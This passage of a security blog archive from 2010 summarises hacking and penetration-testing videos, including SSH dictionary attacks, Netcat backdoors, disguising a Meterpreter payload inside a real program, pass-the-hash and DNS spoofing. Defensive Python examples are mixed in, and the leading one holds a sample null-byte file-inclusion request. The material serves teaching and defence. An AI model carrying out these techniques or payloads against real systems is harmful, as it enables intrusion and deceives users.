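    "/vulnerable.php?COLOR=C:\\notes.txt%00",
]


def extract_color(request_uri: str) -> Optional[str]:
    """Return the percent-decoded COLOR value of a request URI, or None."""
    query = urlsplit(request_uri).query
    values = parse_qs(query, keep_blank_values=True).get("COLOR")
    return values[0] if values else None


def classify_color(value: str) -> str:
    """Label a COLOR value by the misuse class it matches; 'plain' if none."""
    if "://" in value:
        return "remote-include"          # include fetched over the network
    if "\x00" in value:
        return "null-byte-suffix-strip"  # %00 stops PHP appending '.php'
    if "../" in value or "..\\" in value:
        return "directory-traversal"     # climbs out of the web root
    if value.startswith("/") or (len(value) > 1 and value[1] == ":"):
        return "absolute-local-path"     # e.g. an already uploaded file
    return "plain"


def safe_include_path(value: Optional[str]) -> str:
    """What the fixed script should do: map the parameter onto an allowlist,
    fall back to the default, then confirm the result stays in the web root."""
    color = value if value in ALLOWED_COLORS else "blue"
    target = os.path.realpath(os.path.join(WEB_ROOT, color + ".php"))
    if os.path.dirname(target) != os.path.realpath(WEB_ROOT):
        raise ValueError("include target escaped the web root")
    return target


def audit(request_uris: List[str]) -> List[Tuple[str, str, str]]:
    """For each request: (uri, misuse class, path the fixed script would include)."""
    rows = []
    for uri in request_uris:
        value = extract_color(uri)
        label = classify_color(value) if value is not None else "missing"
        rows.append((uri, label, safe_include_path(value)))
    return rows


if __name__ == "__main__":
    for uri, label, path in audit(SAMPLE_REQUESTS):
        print("%-58s %-24s -> %s" % (uri, label, path))
```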

Wednesday, April 14, 2010

SSH Hacking

In this video, a shell script does the work on Linux to hack into an SSH account. A dictionary attack is launched against SSH using the shell script to crack the password.

Tuesday, April 13, 2010

Using NetCat as a Backdoor

In this video a Windows RPC exploit is used with the help of Metasploit on Backtrack. After exploiting the RPC vulnerability in Windows, the hacker uploads the Netcat tool to regain access whenever he wants.

Monday, April 12, 2010

Metasploit Autopwn Tool


This video shows the Metasploit Autopwn tool in action. After identifying a victim's machine using port scanning techniques, run the Metasploit framework and connect to the sqlite database. Then run a port scan on the victim's machine so that the result is saved in the database. After that, run the Autopwn tool against the port scan result; Autopwn will automatically run all the exploits against the open ports. When the attack completes successfully, we get open sessions. This can also be achieved by running Autopwn exploits against the result saved by Nessus in NBE format.

Sunday, April 11, 2010

Dump Cleartext Passwords From Windows Memory

MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.

Friday, April 9, 2010

DNS Spoof Virtual Hosts

DNS Spoofing is a type of MITM attack in which the victim's computer is sent a fake DNS reply for a particular website, forcing his machine to visit a different site. But when the spoofed IP is hosting multiple virtual sites with multiple Host headers and the attacker wants to use this IP as a fake DNS reply for DNS Spoofing, the server will not be able to determine the proper destination, as the expected Host header will be missing from the request. Hence the DNS Spoofing attack will not succeed.

In this video, Ettercap is combined with a C program that changes the Host header on the fly and submits a new GET request to the web server, which allows an attacker to successfully launch a DNS Spoofing attack with an IP hosting multiple virtual web sites.

Thursday, April 8, 2010

Attacking Oracle with the Metasploit Framework

The Oracle Database (commonly referred to as Oracle RDBMS or simply as Oracle) is a relational database management system (RDBMS) produced and marketed by Oracle Corporation. As of 2009, Oracle remains a major presence in database computing.
Larry Ellison and his friends and former co-workers Bob Miner and Ed Oates started the consultancy Software Development Laboratories (SDL) in 1977. SDL developed the original version of the Oracle software. The name Oracle comes from the code-name of a CIA-funded project Ellison had worked on while previously employed by Ampex.

Wednesday, April 7, 2010

Auditing Anti-Virus Configuration and Installation with Nessus 3

Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:
  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets.
On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system. According to surveys, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools surveys. Tenable estimates that it is used by over 75,000 organizations worldwide.

Tuesday, April 6, 2010

Exploiting XP with SAINT

The SAINT vulnerability scanner identifies threats across your network including devices, operating systems, desktop applications, Web applications, databases, and more. The penetration testing component is integrated with the SAINT vulnerability scanner. SAINTexploit automates the penetration testing process, examines vulnerabilities discovered by the scanner, exposes where the attacker could breach the network, and exploits the vulnerability to prove its existence without a doubt.

Monday, April 5, 2010

Exploiting Windows Vista with Core Impact 8

CORE IMPACT is a commercial automated penetration testing software solution developed by Core Security Technologies which allows the user to probe for and exploit security vulnerabilities in computer networks, endpoints and web applications.
The product's interface is designed to be usable by individuals both with and without specialized training in penetration testing and vulnerability assessment, and includes functions for generating reports from the gathered information. It is used by over 800 companies and government entities worldwide.
Core Impact is designed to evaluate the security of an office ecosystem as a whole, checking for known exploits, vulnerability to psychological attack, viability of current software and hardware security, as well as checking for compliance with government regulation.

Hacking Guestbook (Redirect)

Sunday, April 4, 2010

Owning with Nessus and Metasploit


Saturday, April 3, 2010

Packing Metasploit's Meterpreter with Calculator using IExpress

This video demonstrates how a built in tool of XP and Vista (IExpress), can be used to pack a malicious payload with a real program to make it less likely for a user to think anything malicious is happening.

Friday, April 2, 2010

Meterpreter as a Backdoor

A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice), or could be a modification to an existing program or hardware device.

Pass the Hash with modified SMB Client Vulnerability

A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.

In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host.

Thursday, April 1, 2010

Cracking Tutorial

Software cracking is the modification of software to remove protection methods: copy protection, trial/demo version, serial number, hardware key, date checks, CD check or software annoyances like nag screens and adware.
The distribution and use of cracked copies is illegal in almost every developed country. There have been many lawsuits over cracking software, but most had to do with the distribution of the duplicated product rather than the process of defeating the protection, due to the difficulty of constructing legally sound proof of individual guilt in the latter instance. In the United States, the Digital Millennium Copyright Act (DMCA) made software cracking, as well as the distribution of information that facilitates software cracking, illegal. However, the law has hardly been tested in U.S. courts in cases of reverse engineering for personal use only. The European Union passed the EU Copyright Directive in May 2001, which makes software copyright infringement illegal as the member states pass legislation pursuant to the directive.

Wednesday, March 31, 2010

Amazon EC2 Service In Depth (Cloud Computing)

Cloud computing is Internet-based computing, whereby shared resources, software and information are provided to computers and other devices on-demand, like a public utility.
It is a paradigm shift following the shift from mainframe to client-server that preceded it in the early '80s. Details are abstracted from the users who no longer have need of, expertise in, or control over the technology infrastructure "in the cloud" that supports them. Cloud computing describes a new supplement, consumption and delivery model for IT services based on the Internet, and it typically involves the provision of dynamically scalable and often virtualized resources as a service over the Internet. It is a byproduct and consequence of the ease-of-access to remote computing sites provided by the Internet.
The term cloud is used as a metaphor for the Internet, based on the cloud drawing used in the past to represent the telephone network, and later to depict the Internet in computer network diagrams as an abstraction of the underlying infrastructure it represents. Typical cloud computing providers deliver common business applications online which are accessed from another web service or software like a web browser, while the software and data are stored on servers.
A technical definition is "a computing capability that provides an abstraction between the computing resource and its underlying technical architecture (e.g., servers, storage, networks), enabling convenient, on-demand network access to a shared pool of configurable computing resources that can be rapidly provisioned and released with minimal management effort or service provider interaction." This definition states that clouds have five essential characteristics: on-demand self-service, broad network access, resource pooling, rapid elasticity, and measured service.
The majority of cloud computing infrastructure, as of 2009, consists of reliable services delivered through data centers and built on servers. Clouds often appear as single points of access for all consumers' computing needs. Commercial offerings are generally expected to meet quality of service (QoS) requirements of customers and typically offer SLAs.

Tuesday, March 30, 2010

Reset Passwords on Windows XP and Vista using Backtrack 4

chntpw is a Linux utility for resetting passwords of Windows (NT or 2k) users. It works by modifying the encrypted password in the registry directly, bypassing the need to use the old password.

Terminal Server / RDP Cracking

The simple demonstration above, using the featured tools, shows the dangers of using weak passwords (those that can be found in a dictionary file) in Windows Remote Terminal Services and Remote Desktop Protocol (RDP).

Monday, March 29, 2010


A firewall is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices configured to permit or deny computer applications based upon a set of rules and other criteria.
Firewalls can be implemented in either hardware or software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.
There are several types of firewall techniques:
  1. Packet filter: Packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules. Although difficult to configure, it is fairly effective and mostly transparent to its users. It is susceptible to IP spoofing.
  2. Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.
  3. Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking.
  4. Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.

Saturday, March 27, 2010

Samurai Web Assessment Framework

The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. The tools included are used in all four steps of a web pen-test.
Reconnaissance is covered by tools such as the Fierce domain scanner and Maltego; mapping by tools such as WebScarab and ratproxy; discovery by w3af and burp; and exploitation, the final stage, by BeEF, AJAXShell and much more.

Friday, March 26, 2010

Creating a Win32 Reverse Connect Back Trojan using Netcat

Netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can create almost any kind of connection you would need and has a number of built-in capabilities.

In 2000, Netcat was voted the second most functional network security tool. Also, in 2003 and 2006 it gained fourth place in the same category. Netcat is often referred to as a "Swiss-army knife for TCP/IP." Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

Some of netcat's major features are:

* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomization
* Built-in loose source-routing capability
* Can read command line arguments from standard input
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Optional ability to let another program service established connections
* Optional telnet-options responder
* Featured tunneling mode which also allows special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel).

2010 Top Ten Hacks of the Year

Thursday, March 25, 2010

SSL Hacking and DNS Spoofing with Backtrack using Ettercap

Ettercap is a Unix and Windows tool for computer network protocol analysis and security auditing. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols.
It is free open source software, licensed under the terms of the GNU General Public License.


Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap offers four modes of operation:
  • IP-based: packets are filtered based on IP source and destination.
  • MAC-based: packets are filtered based on MAC address, useful for sniffing connections through a gateway.
  • ARP-based: uses ARP poisoning to sniff on a switched LAN between two hosts (full-duplex).
  • PublicARP-based: uses ARP poisoning to sniff on a switched LAN from a victim host to all other hosts (half-duplex).
In addition, the software also offers the following features:
  • Character injection into an established connection: characters can be injected into a server (emulating commands) or to a client (emulating replies) while maintaining a live connection.
  • SSH1 support: the sniffing of a username and password, and even the data of an SSH1 connection. Ettercap is the first software capable of sniffing an SSH connection in full duplex.
  • HTTPS support: the sniffing of HTTP SSL secured data--even when the connection is made through a proxy.
  • Remote traffic through a GRE tunnel: the sniffing of remote traffic through a GRE tunnel from a remote Cisco router, and performing a man-in-the-middle attack on it.
  • Plug-in support: creation of custom plugins using Ettercap's API.
  • Password collectors for: TELNET, FTP, POP, IMAP, rlogin, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, Half-Life, Quake 3, MSN, YMSG
  • Packet filtering/dropping: setting up a filter that searches for a particular string (or hexadecimal sequence) in the TCP or UDP payload and replaces it with a custom string/sequence of choice, or drops the entire packet.
  • OS fingerprinting: determine the OS of the victim host and its network adapter.
  • Kill a connection: killing connections of choice from the connections-list.
  • Passive scanning of the LAN: retrieval of information about hosts on the LAN, their open ports, the version numbers of available services, the type of the host (gateway, router or simple PC) and estimated distances in number of hops.
  • Hijacking of DNS requests.
Ettercap also has the ability to actively or passively find other poisoners on the LAN.
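A passive check for the ARP poisoning that the ARP-based modes above rely on (and that the poisoner-finding feature just mentioned looks for), as an added example that is not from the original post or from Ettercap; the ARP replies, addresses and the known gateway binding are all constructed.

```python
"""Passive ARP-poisoning check over observed ARP replies.  Added example, not
from the original post or from Ettercap; all addresses are constructed."""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed bindings the administrator trusts (here: the gateway's real MAC).
KNOWN_BINDINGS = {"10.0.0.1": "00:11:22:33:44:01"}

# Constructed ARP replies seen on the segment: (seconds, sender IP, sender MAC).
SAMPLE_REPLIES = [
    (0.0, "10.0.0.1", "00:11:22:33:44:01"),
    (1.0, "10.0.0.50", "00:11:22:33:44:50"),
    (5.0, "10.0.0.1", "de:ad:be:ef:00:99"),   # another MAC now claims the gateway
    (5.1, "10.0.0.50", "de:ad:be:ef:00:99"),  # ...and the host talking to it
    (6.0, "10.0.0.60", "00:11:22:33:44:60"),
]

Reply = Tuple[float, str, str]
Finding = Tuple[str, str, Tuple[str, ...]]


def bindings(replies: List[Reply]) -> Tuple[Dict[str, Set[str]], Dict[str, Set[str]]]:
    """Build IP->MACs and MAC->IPs maps from the observed replies."""
    ip_to_macs: Dict[str, Set[str]] = defaultdict(set)
    mac_to_ips: Dict[str, Set[str]] = defaultdict(set)
    for _, ip, mac in replies:
        ip_to_macs[ip].add(mac.lower())
        mac_to_ips[mac.lower()].add(ip)
    return ip_to_macs, mac_to_ips


def find_poisoning(replies: List[Reply],
                   known: Dict[str, str] = KNOWN_BINDINGS) -> List[Finding]:
    """Findings, each (kind, subject, evidence):
    - 'known-mismatch': a trusted IP was claimed by a MAC other than its known one
    - 'conflict':       one IP was claimed by more than one MAC
    - 'multi-ip-mac':   one MAC claimed several IPs, the full-duplex MITM shape
    """
    ip_to_macs, mac_to_ips = bindings(replies)
    findings: List[Finding] = []
    for ip, macs in sorted(ip_to_macs.items()):
        for mac in sorted(macs):
            if ip in known and mac != known[ip].lower():
                findings.append(("known-mismatch", ip, (mac,)))
        if len(macs) > 1:
            findings.append(("conflict", ip, tuple(sorted(macs))))
    for mac, ips in sorted(mac_to_ips.items()):
        if len(ips) > 1:
            findings.append(("multi-ip-mac", mac, tuple(sorted(ips))))
    return findings


if __name__ == "__main__":
    for kind, subject, evidence in find_poisoning(SAMPLE_REPLIES):
        print("%-15s %-18s %s" % (kind, subject, ", ".join(evidence)))
```

Routers and virtualisation hosts legitimately answer for several IPs, so in practice the multi-ip-mac rule needs an allowlist of such hosts.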

Wednesday, March 24, 2010

Yahoo! Account Security Failure (POC)

How Cross-Site Scripting (XSS) Works

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner.

Tuesday, March 23, 2010

Friday, March 19, 2010


Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity. The word steganography is of Greek origin and means "concealed writing", from the Greek words steganos meaning covered or protected, and graphein (Γράφειν) meaning to write. The first recorded use of the term was in 1499 by Johannes Trithemius in his Steganographia, a treatise on cryptography and steganography disguised as a book on magic. Generally, messages will appear to be something else: images, articles, shopping lists, or some other covertext and, classically, the hidden message may be in invisible ink between the visible lines of a private letter.
The advantage of steganography, over cryptography alone, is that messages do not attract attention to themselves. Plainly visible encrypted messages—no matter how unbreakable—will arouse suspicion, and may in themselves be incriminating in countries where encryption is illegal. Therefore, whereas cryptography protects the contents of a message, steganography can be said to protect both messages and communicating parties.
Steganography includes the concealment of information within computer files. In digital steganography, electronic communications may include steganographic coding inside of a transport layer, such as a document file, image file, program or protocol. Media files are ideal for steganographic transmission because of their large size. As a simple example, a sender might start with an innocuous image file and adjust the color of every 100th pixel to correspond to a letter in the alphabet, a change so subtle that someone not specifically looking for it is unlikely to notice it.
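The every-100th-pixel scheme just described, carried out on a raw RGB buffer as an added example (not code from the original post): the letter code goes into the low five bits of the red channel, so no sample changes by more than 31 out of 255. The cover image is a constructed pseudo-random byte buffer; no real image format is involved.

```python
"""The 'every 100th pixel' scheme on a raw RGB buffer.  Added example, not code
from the original post; the cover image is a constructed random byte buffer."""
import random
from typing import Tuple

STRIDE = 100          # only every 100th pixel carries a letter
BYTES_PER_PIXEL = 3   # packed RGB, red byte first
END_MARK = 0          # code 0 terminates the message; 1..26 are A..Z
CODE_MASK = 0x1F      # the low five bits of the red channel hold the code


def make_cover(num_pixels: int = 1000, seed: int = 7) -> bytes:
    """Constructed cover image: deterministic pseudo-random RGB bytes."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(num_pixels * BYTES_PER_PIXEL))


def letter_code(ch: str) -> int:
    if not ("A" <= ch.upper() <= "Z"):
        raise ValueError("only letters A-Z can be hidden, got %r" % ch)
    return ord(ch.upper()) - ord("A") + 1


def embed(cover: bytes, message: str) -> bytes:
    """Copy `cover` with `message` written into the red channel of pixels
    0, 100, 200, ...; each touched sample changes by at most 31 out of 255."""
    codes = [letter_code(c) for c in message] + [END_MARK]
    capacity = len(cover) // (STRIDE * BYTES_PER_PIXEL)   # usable pixels
    if len(codes) > capacity:
        raise ValueError("cover holds %d letters, message needs %d"
                         % (capacity - 1, len(message)))
    stego = bytearray(cover)
    for i, code in enumerate(codes):
        offset = i * STRIDE * BYTES_PER_PIXEL            # red byte of pixel i*100
        stego[offset] = (stego[offset] & ~CODE_MASK & 0xFF) | code
    return bytes(stego)


def extract(stego: bytes) -> str:
    """Read codes back from the same positions until the end mark."""
    letters = []
    for offset in range(0, len(stego), STRIDE * BYTES_PER_PIXEL):
        code = stego[offset] & CODE_MASK
        if code == END_MARK:
            break
        if not 1 <= code <= 26:
            raise ValueError("no valid message: code %d at byte %d" % (code, offset))
        letters.append(chr(ord("A") + code - 1))
    return "".join(letters)


def distortion(cover: bytes, stego: bytes) -> Tuple[int, int]:
    """(bytes changed, largest per-sample change): how 'subtle' the edit is."""
    deltas = [abs(a - b) for a, b in zip(cover, stego) if a != b]
    return len(deltas), max(deltas, default=0)


if __name__ == "__main__":
    cover = make_cover()
    stego = embed(cover, "Hello")
    print("recovered:", extract(stego))
    print("bytes changed, worst delta:", distortion(cover, stego))
```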

Wednesday, March 17, 2010

Forensic Toolkit (FTK)

Forensic Toolkit, or FTK, is computer forensics software made by AccessData. It scans a hard drive looking for various information. It can, for example, locate deleted emails and scan a disk for text strings to use them as a password dictionary to crack encryption.

Tuesday, March 16, 2010


Honeyd is an open source computer program that allows a user to set up and run multiple virtual hosts on a computer network. These virtual hosts can be configured to mimic several different types of servers, allowing the user to simulate an infinite number of computer network configurations. Honeyd is primarily used in the field of computer security by professionals and hobbyists alike, and is included as part of Knoppix Security Tools Distribution.



Honeyd is used primarily for two purposes. Using the software's ability to mimic many different network hosts at once (up to 65536 hosts at once), Honeyd can act as a distraction to potential hackers. If a network only has 3 real servers, but one server is running Honeyd, the network will appear to be running hundreds of servers to a hacker. The hacker will then have to do more research (possibly through social engineering) in order to determine which servers are real, or the hacker may get caught in a honeypot. Either way, the hacker will be slowed down or possibly caught.


Honeyd gets its name for its ability to be used as a honeypot. On a network, all normal traffic should be to and from valid servers only. Thus, a network administrator running Honeyd can monitor his/her logs to see if there is any traffic going to the virtual hosts set up by Honeyd. Any traffic going to these virtual servers can be considered highly suspicious. The network administrator can then take preventative action, perhaps by blocking the suspicious IP address or by further monitoring the network for suspicious traffic.
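The log check the last two paragraphs describe, together with the "don't become a launch point" goal from the Honey Pot post earlier on this page: an added example (not code from the original post or from Honeyd) that flags traffic to decoy addresses, sources that sweep several decoys, and any connection a decoy itself initiates. The network, the log format and every address are constructed.

```python
"""Flag traffic that touches Honeyd's virtual hosts, and any connection a
decoy starts itself.  Added example, not code from the original post or from
Honeyd; the network, the log format and every address are constructed."""
import re
from collections import defaultdict
from typing import Dict, Iterator, List, Set, Tuple

# Constructed network: three real servers, ten Honeyd virtual hosts.
REAL_HOSTS = {"10.0.0.5", "10.0.0.6", "10.0.0.7"}
DECOYS = {"10.0.0.%d" % i for i in range(20, 30)}  # 10.0.0.20 - 10.0.0.29

# Constructed connection-log format: "<date> <time> <proto> <src>:<port> -> <dst>:<port>"
LOG_RE = re.compile(
    r"^(\S+ \S+) (TCP|UDP) (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$"
)

# Constructed log: ordinary traffic to real hosts, one source sweeping the
# decoy range, an SNMP probe, a decoy dialling out, and one unparseable line.
SAMPLE_LOG = """\
2010-04-16 09:58:01 TCP 192.0.2.10:40211 -> 10.0.0.5:80
2010-04-16 09:58:03 TCP 192.0.2.10:40212 -> 10.0.0.6:443
2010-04-16 10:01:02 TCP 203.0.113.7:51234 -> 10.0.0.21:22
2010-04-16 10:01:02 TCP 203.0.113.7:51235 -> 10.0.0.22:22
2010-04-16 10:01:03 TCP 203.0.113.7:51236 -> 10.0.0.23:22
2010-04-16 10:01:03 TCP 203.0.113.7:51237 -> 10.0.0.7:22
2010-04-16 10:05:44 UDP 198.51.100.4:5353 -> 10.0.0.25:161
2010-04-16 10:09:10 TCP 10.0.0.22:33000 -> 198.51.100.9:6667
this line is deliberately malformed and must be skipped
"""


def parse(log_text: str) -> Iterator[dict]:
    """Yield one record per well-formed line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield {"time": m.group(1), "proto": m.group(2),
                   "src": m.group(3), "sport": int(m.group(4)),
                   "dst": m.group(5), "dport": int(m.group(6))}


def analyse(log_text: str, decoys: Set[str] = DECOYS) -> Tuple[Dict[str, Set[str]], List[dict]]:
    """Return (contacts, egress): contacts maps each source that touched a decoy
    to the decoys it touched; egress lists connections a decoy itself opened to
    a non-decoy address, which a decoy should never do."""
    contacts: Dict[str, Set[str]] = defaultdict(set)
    egress: List[dict] = []
    for rec in parse(log_text):
        if rec["dst"] in decoys:
            contacts[rec["src"]].add(rec["dst"])
        if rec["src"] in decoys and rec["dst"] not in decoys:
            egress.append(rec)
    return dict(contacts), egress


def sweepers(contacts: Dict[str, Set[str]], threshold: int = 3) -> List[str]:
    """Sources that touched at least `threshold` decoys: a scan of the range,
    not a single mistyped address."""
    return sorted(src for src, hit in contacts.items() if len(hit) >= threshold)


if __name__ == "__main__":
    contacts, egress = analyse(SAMPLE_LOG)
    for src in sorted(contacts):
        print("decoy contact from %s: %s" % (src, ", ".join(sorted(contacts[src]))))
    print("range sweep from:", sweepers(contacts))
    for rec in egress:
        print("decoy %s opened %s/%d to %s" % (rec["src"], rec["proto"], rec["dport"], rec["dst"]))
```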